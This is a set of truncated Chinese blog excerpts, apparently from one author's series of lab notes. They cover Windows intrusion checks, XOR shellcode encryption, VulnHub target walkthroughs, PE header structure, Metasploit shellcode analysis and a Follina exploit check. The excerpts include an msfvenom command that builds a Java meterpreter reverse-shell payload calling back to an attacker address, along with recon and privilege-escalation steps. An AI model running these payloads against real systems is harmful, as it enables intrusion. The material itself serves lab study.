# 入侵排查 ## 1.账号安全 ``` net user ``` 查看是否有异常用户 #C

#shellcode加密 ##对称加密 对称加密 a明文---c密钥---->b密文 b密文---c密钥---->a明文 ##xor异或加密 把每一个key的ascii码的二进制和shellcode的二进制做一个异或运算，在赋值给新的shellcode#C

#DAY6 靶机：https://download.vulnhub.com/evilbox/EvilBox---One.ova 攻击机：kali2022.2 目标：两个flag，root权限 没错，鸽了好久我又来了，主要这次在边界突破卡的有点久 #总结 主机发现（新方法fping） 端口扫描、服务探测

PE结构学习与沙箱模拟cs新生成一个shanque.exe用Everedit打开在分析之前先说几个概念pe结构：可执行文件的头部结构分类DWORD：8个位置，4字节WORD：4个位置，2字节BYTE：2个位置，1字节大概有DOS头，NT头组成。第一部分DOS头用来支持在dos操作系统上来运行typedef struct _IMAGE_DOS_HEADER { // D

上次突破边界之后使用CVE-2021-3439比较容易的拿下了root，但是靶机是2020年发布的，这次来尝试用别的办法提权 #信息收集 ```bash cat /etc/passwd ``` ![](https://nc0.cdn.zkaq.cn/md/12898/6eab809e3fcd3c8269f0510

第一部分MSFshellcode分析day2-day6给小伙伴们分析了meterpreter的源码，这次来分析shellcode第一段用哈希去寻找api函数; Input: The hash of the API to call and all its parameters must be pushed onto stack.; Output: The return value from the

shanqueday5靶机：https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova攻击机：kali2022.2目标：root权限信息收集主机发现arp-scan -l得到靶机地址：10.0.3.10端口扫描全端口扫描nmap -p- 10.0.3.10开放22808000服务探测nmap -p22,80,8000 -

#msfshellcode上线流程分析 1.生成木马 ```bash msfvenom -p java/meterpreter/reverse_tcp LHOST=10.0.3.4 LPORT=4444 > 1.jar ``` ![](https://nc0.cdn.zkaq.cn/md/1

day4咕咕咕，鸽了一天今天继续来打靶啦。靶机：https://download.vulnhub.com/admx/AdmX_new.7z攻击机：kali2022.2目标：两个flag，root权限信息收集1.主机发现这次使用nmap来进行主机发现nmap -sn 10.0.3.1/24不得不说用过的工具里面还是arp-scan和nmap最好用发现ip地址：10.0.3.92.端口扫描/服务

 漏洞验证 1.python follina.py 2.会在www目录生成exploit.html ![](https://nc0.cdn.zkaq.c